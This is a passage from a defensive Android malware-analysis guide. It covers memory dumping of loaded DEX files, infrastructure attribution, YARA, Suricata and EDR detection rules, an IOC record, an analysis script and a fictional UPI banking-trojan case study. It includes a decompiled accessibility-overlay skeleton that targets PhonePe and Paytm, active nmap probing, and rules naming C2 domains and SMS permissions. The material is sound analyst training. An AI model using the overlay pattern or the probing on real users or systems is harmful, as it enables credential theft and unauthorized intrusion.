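The entropy threshold is deliberately paired with a magic-byte allowlist: images, nested ZIPs and native libraries are legitimately high-entropy, and without that filter every icon in res/ would be flagged.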

Memory Dumping and Analysis

Extract runtime memory for advanced analysis:

# A linear dd over /proc/<pid>/mem does not work: the read fails with EIO at the first
# unmapped gap. Read only the ranges listed in /proc/<pid>/maps (a short script does
# it), or let Frida enumerate the ranges for you.

# Dump the DEX files an app has loaded, including ones decrypted at runtime
pip install frida-dexdump
frida-dexdump -U -f com.malware.package     # writes the dumped DEX files to a directory named after the package

# Analyze the dumped DEX for strings and patterns
strings -n 8 com.malware.package/*.dex | grep -E "(https?://|\.com|\.org)"
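For an environment without Frida, or to understand what frida-dexdump is doing, the range-walking approach fits in a few dozen lines. The following is an added example (not code from the original article): it parses /proc/<pid>/maps for readable mappings, scans each for the DEX magic, reads the header to validate header_size and obtain file_size, and carves exactly that many bytes, reading across a mapping boundary when a DEX straddles one. Memory access is abstracted as a read(addr, size) callback so the same carver runs over /proc/<pid>/mem (root on the device, or your own pid) and over a constructed buffer; the SAMPLE_DEX blob is a stand-in with only the header fields the carver checks, not a complete DEX.

```python
"""Added example: carve DEX files out of a live process by walking /proc/<pid>/maps and
reading only the mapped ranges of /proc/<pid>/mem."""
import re
import struct

DEX_MAGIC = b"dex\n"
MAPS_LINE = re.compile(r"^([0-9a-f]+)-([0-9a-f]+)\s+(\S{4})\s")
MAX_RANGE = 512 << 20   # skip absurdly large reservations (guard regions, huge arenas)


def parse_maps(maps_text):
    """Return (start, end, perms) for every readable mapping in a /proc/<pid>/maps listing."""
    ranges = []
    for line in maps_text.splitlines():
        m = MAPS_LINE.match(line)
        if m and m.group(3).startswith("r"):
            ranges.append((int(m.group(1), 16), int(m.group(2), 16), m.group(3)))
    return ranges


def carve_dex(ranges, read, max_size=64 << 20):
    """read(addr, size) -> bytes (possibly short) or None. Scans each readable range for the
    DEX magic, then carves file_size bytes (header offset 0x20). header_size at 0x24 must be
    0x70, which weeds out the literal string "dex\\n" sitting in ordinary data."""
    found = []
    for start, end, _ in ranges:
        if end - start > MAX_RANGE:
            continue
        data = read(start, end - start) or b""
        pos = data.find(DEX_MAGIC)
        while pos != -1:
            hdr = read(start + pos, 0x70)
            if hdr and len(hdr) == 0x70:
                file_size, header_size = struct.unpack_from("<II", hdr, 0x20)
                if header_size == 0x70 and 0x70 < file_size <= max_size:
                    chunk = read(start + pos, file_size)    # may continue into the next mapping
                    if chunk and len(chunk) == file_size:
                        found.append((start + pos, chunk))
            pos = data.find(DEX_MAGIC, pos + 4)
    return found


def proc_reader(pid):
    """Reader over a real process (needs ptrace rights: root on Android, or your own pid)."""
    mem = open("/proc/%d/mem" % pid, "rb", buffering=0)

    def read(addr, size):
        try:
            mem.seek(addr)
            return mem.read(size)
        except (OSError, ValueError, OverflowError):   # unmapped, [vvar], vsyscall page ...
            return None
    return read


# Constructed stand-in for a loaded DEX: valid magic, file_size = 0x80, header_size = 0x70
SAMPLE_DEX = (DEX_MAGIC + b"035\0" + b"\0" * 24 + struct.pack("<II", 0x80, 0x70)
              + b"\0" * (0x70 - 0x28) + b"PAYLOAD!PAYLOAD!")

if __name__ == "__main__":
    import os
    try:
        with open("/proc/self/maps") as f:
            ranges = parse_maps(f.read())
        # Scanning our own process finds SAMPLE_DEX (and copies made while scanning)
        for addr, dex in carve_dex(ranges, proc_reader(os.getpid())):
            print("DEX at 0x%x, %d bytes" % (addr, len(dex)))
    except FileNotFoundError:
        print("no /proc on this platform")
```

On a device the pid comes from pidof, and the carved blobs go straight into the header parser and jadx. Expect duplicates: ART keeps the original DEX, its vdex/odex derivatives and any in-memory copies the unpacker made.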

Attribution and Intelligence Analysis

Infrastructure Analysis

Map malware infrastructure for threat attribution:

Domain and IP Analysis:

# DNS and registration lookups
dig +short malware-c2.com
whois malware-c2.com

# Check certificate transparency logs (%25 is a URL-encoded % wildcard, so this also returns subdomains)
curl -s "https://crt.sh/?q=%25.malware-c2.com&output=json"

# Analyze hosting infrastructure. Both commands are active probes from your own address
# that the operator can see in their logs; run them from dedicated research egress, and
# prefer passive sources (passive DNS, Shodan/Censys history) when attribution is the goal.
traceroute malware-c2.com
nmap -sS -O malware-c2.com

Certificate Analysis:

# Extract the v1 signing certificate from the APK (the file may also be CERT.DSA or
# CERT.EC; v2/v3 signatures live in the APK Signing Block, not under META-INF)
unzip -j malware.apk 'META-INF/*.RSA' 'META-INF/*.DSA' 'META-INF/*.EC'
openssl pkcs7 -inform DER -in CERT.RSA -print_certs -text -noout
# (apksigner verify --print-certs malware.apk, from the SDK build-tools, covers all schemes)

# Analyze certificate attributes: subject, validity period, key size and certificate digest
# Compare with known APT signing certificates; a reused self-signed cert links samples reliably

Code Similarity Analysis

Compare with known malware families:

# Generate fuzzy hashes. Compression defeats fuzzy hashing, so hash the extracted
# classes.dex (and native libraries), not the APK itself
ssdeep extracted/classes.dex
tlsh -f extracted/classes.dex

# YARA rule matching (also on the extracted tree: YARA does not unpack ZIPs)
yara -r malware_rules.yar extracted/

# Compare with VirusTotal submissions
# Check family classification and detection rates

Behavioral Pattern Analysis

Document malware capabilities and TTPs:

MITRE ATT&CK Mobile Mapping (use the Mobile matrix identifiers; the Enterprise techniques with the same names carry different IDs):

  • Initial Access: Phishing (T1660)
  • Persistence: Event Triggered Execution: Broadcast Receivers (T1624.001)
  • Credential Access: Input Capture: GUI Input Capture (T1417.002), the overlay attack
  • Collection: Screen Capture (T1513), Location Tracking (T1430), Protected User Data: SMS Messages (T1636.004)
  • Command and Control: Web Service (T1481)
  • Exfiltration: Exfiltration Over C2 Channel (T1646)

[Figure: MITRE ATT&CK framework mapping for mobile malware tactics and techniques]

Detection and Prevention Strategies

YARA Rule Development

Create detection signatures for identified malware:

rule Android_Malware_Family_X {
    meta:
        author = "MetaCache Cybersecurity"
        date = "2025-09-06"
        description = "Detects Android malware family X"

    strings:
        // The binary AndroidManifest.xml stores strings as UTF-16 (UTF-8 with newer
        // aapt2 builds), so match both encodings. BIND_DEVICE_ADMIN is the permission
        // that actually appears in device-admin malware; DEVICE_ADMIN does not exist.
        $manifest_perm1 = "android.permission.SEND_SMS" ascii wide
        $manifest_perm2 = "android.permission.BIND_DEVICE_ADMIN" ascii wide
        $c2_url = "evil-domain.com" ascii wide
        // Add hex patterns only from the sample itself: Dalvik bytecode from classes.dex
        // or native code from lib/. x86-64 opcodes from a desktop sample never match here.

    condition:
        $manifest_perm1 and $manifest_perm2 and $c2_url
}

Network-Based Detection

Implement network monitoring for malware traffic:

# Suricata rule for plaintext HTTP C2 (backslash line continuations are accepted by the
# rule loader). For TLS C2 the URI is invisible; match the SNI with tls.sni instead.
alert http $HOME_NET any -> $EXTERNAL_NET any \
    (msg:"Android Malware C2 Communication"; \
     flow:established,to_server; \
     content:"POST"; http_method; \
     content:"/api/upload"; http_uri; \
     reference:url,metacache.in; \
     classtype:trojan-activity; sid:1000001; rev:1;)

Endpoint Detection Rules

Create mobile EDR rules for runtime detection:

{
    "rule_name": "Android_Malware_Accessibility_Abuse",
    "description": "Detects accessibility service abuse",
    "conditions": [
        {
            "event_type": "service_started",
            "service_type": "accessibility",
            "package_name": "!com.google.*"
        },
        {
            "event_type": "screen_reader",
            "target_package": "com.android.systemui"
        }
    ],
    "severity": "high"
}

Threat Intelligence Integration

IOC Extraction and Sharing

Document and share threat indicators:

{
    "malware_family": "AndroidBanker.X",
    "sha256": "a1b2c3d4e5f6...",
    "c2_domains": [
        "evil-domain.com",
        "backup-c2.net"
    ],
    "target_applications": [
        "com.phonepe.app",
        "net.one97.paytm",
        "in.org.npci.upiapp"
    ],
    "capabilities": [
        "sms_interception",
        "screen_overlay",
        "contact_exfiltration"
    ],
    "attribution": {
        "campaign": "UPI-Stealer-2025",
        "region": "India",
        "confidence": "medium"
    }
}

Automated Analysis Pipeline

Implement scalable analysis workflows:

#!/usr/bin/env python3
import json
import re
import subprocess
import zipfile
from pathlib import Path


class AndroidMalwareAnalyzer:
    def __init__(self, apk_path):
        self.apk_path = Path(apk_path)
        self.results = {}

    def static_analysis(self):
        # APK metadata extraction (aapt from the Android SDK build-tools must be on PATH)
        result = subprocess.run(['aapt', 'dump', 'badging', str(self.apk_path)],
                                capture_output=True, text=True, check=True)
        self.results['metadata'] = self.parse_aapt_output(result.stdout)

        # Permission analysis
        self.results['permissions'] = self.extract_permissions()

        # String extraction
        self.results['strings'] = self.extract_strings()

        return self.results

    @staticmethod
    def parse_aapt_output(output):
        # "package: name='com.x' versionCode='1' versionName='1.0' ..." -> dict
        meta = {}
        for line in output.splitlines():
            if line.startswith('package:'):
                meta.update(re.findall(r"(\w+)='([^']*)'", line))
            elif line.startswith(('sdkVersion:', 'targetSdkVersion:', 'launchable-activity:')):
                meta[line.split(':', 1)[0]] = re.findall(r"'([^']*)'", line)[0]
        return meta

    def extract_permissions(self):
        # aapt prints "uses-permission: name='X'" or "uses-permission: X" depending on version
        result = subprocess.run(['aapt', 'dump', 'permissions', str(self.apk_path)],
                                capture_output=True, text=True, check=True)
        return sorted(set(re.findall(r"uses-permission: (?:name=')?([\w.]+)", result.stdout)))

    def extract_strings(self, min_len=8):
        # Pull printable strings from every DEX inside the archive; the archive itself is
        # compressed, so running strings on the APK file would mostly return noise
        found = set()
        with zipfile.ZipFile(self.apk_path) as apk:
            for name in apk.namelist():
                if name.endswith('.dex'):
                    pattern = rb'[\x20-\x7e]{%d,}' % min_len
                    found.update(m.decode() for m in re.findall(pattern, apk.read(name)))
        # Keep only network-looking strings for the report; dump the rest to a file if needed
        return sorted(s for s in found if re.search(r'https?://|\.(?:com|net|org|in)\b|/api/', s))

    def dynamic_analysis(self):
        # Automated sandbox analysis: boot the emulator, install, drive the UI,
        # collect the pcap and Frida logs (see the dynamic analysis section)
        pass

    def generate_report(self):
        # Create comprehensive analysis report with IOCs, TTPs and recommendations
        pass


# Usage
if __name__ == '__main__':
    analyzer = AndroidMalwareAnalyzer('malware.apk')
    results = analyzer.static_analysis()
    print(json.dumps(results, indent=2))

Case Study: Analyzing a Real Banking Trojan

Let's walk through a complete analysis of a fictional banking trojan targeting Indian UPI applications:

Initial Assessment

# File: upi_helper.apk (suspicious name mimicking legitimate UPI app)
$ file upi_helper.apk
upi_helper.apk: Android application package file

$ sha256sum upi_helper.apk
f4d2b1c8e3a7f9d6b5c4a8e2f1d9c7b6a5e3f8d2c1b9a6e4f7d3c8b5a2e9f6d4 upi_helper.apk

Manifest Analysis Reveals Concerning Permissions

<uses-permission android:name="android.permission.SEND_SMS" />
<uses-permission android:name="android.permission.RECEIVE_SMS" />
<uses-permission android:name="android.permission.READ_SMS" />
<uses-permission android:name="android.permission.BIND_ACCESSIBILITY_SERVICE" />
<uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW" />

<service android:name=".services.OverlayService"
         android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE">
    <intent-filter>
        <action android:name="android.accessibilityservice.AccessibilityService" />
    </intent-filter>
</service>

Code Analysis Reveals Malicious Intent

Decompiled code shows overlay attack implementation:

public class OverlayService extends AccessibilityService {
    private static final String[] TARGET_PACKAGES = {
        "com.phonepe.app",
        "net.one97.paytm",
        "in.org.npci.upiapp"
    };

    @Override
    public void onAccessibilityEvent(AccessibilityEvent event) {
        // getPackageName() is null for some event types; real samples guard this too
        CharSequence pkg = event.getPackageName();
        if (pkg == null) return;
        String packageName = pkg.toString();

        // Fires whenever the victim brings a targeted UPI app to the foreground
        if (Arrays.asList(TARGET_PACKAGES).contains(packageName)) {
            showPhishingOverlay(packageName);
        }
    }

    @Override
    public void onInterrupt() {
        // Required by AccessibilityService; nothing to do
    }

    private void showPhishingOverlay(String targetApp) {
        // Create fake login overlay (TYPE_APPLICATION_OVERLAY window, hence SYSTEM_ALERT_WINDOW)
        // Steal credentials when user enters PIN
    }
}

Network Analysis Confirms C2 Communication

Traffic analysis reveals:

  • C2 server: upi-secure-api.com
  • Exfiltration of stolen credentials every 24 hours
  • Use of legitimate API endpoints to blend traffic

Attribution Assessment

Based on code patterns, infrastructure, and targeting:

  • Campaign: UPI-Stealer-2025
  • Attribution: Likely financially motivated cybercriminals
  • Targeting: Indian UPI users, specifically PhonePe and Paytm
  • Sophistication: Medium - uses common overlay techniques

Conclusion: Building Defensive Capabilities

Android malware reverse engineering is a critical capability for defending India's mobile ecosystem. Key takeaways for security teams:

Immediate Actions:

  • Establish Analysis Capabilities: Set up static and dynamic analysis environments
  • Develop Detection Rules: Create YARA signatures and network monitoring rules
  • Intelligence Sharing: Participate in threat intelligence communities
  • User Education: Train users to recognize malicious applications

Strategic Investments:

  • Automated Analysis: Implement scalable malware analysis pipelines
  • Threat Intelligence: Build comprehensive threat attribution capabilities
  • Defensive Technologies: Deploy mobile endpoint detection and response
  • Research Partnerships: Collaborate with academic institutions and security vendors

Industry Collaboration:
The Android malware threat requires coordinated response across the ecosystem. Security researchers, mobile operators, financial institutions, and government agencies must work together to:

  • Share threat intelligence and IOCs
  • Develop industry-standard detection mechanisms
  • Create user awareness programs
  • Establish incident response protocols

The techniques outlined in this guide provide the foundation for professional Android malware analysis. As threats continue to evolve, maintaining and advancing these capabilities will be essential for protecting India's digital economy.

Remember: malware analysis requires proper authorization and legal compliance. Always conduct analysis within appropriate legal frameworks and never analyze malware outside of controlled environments designed for security research.
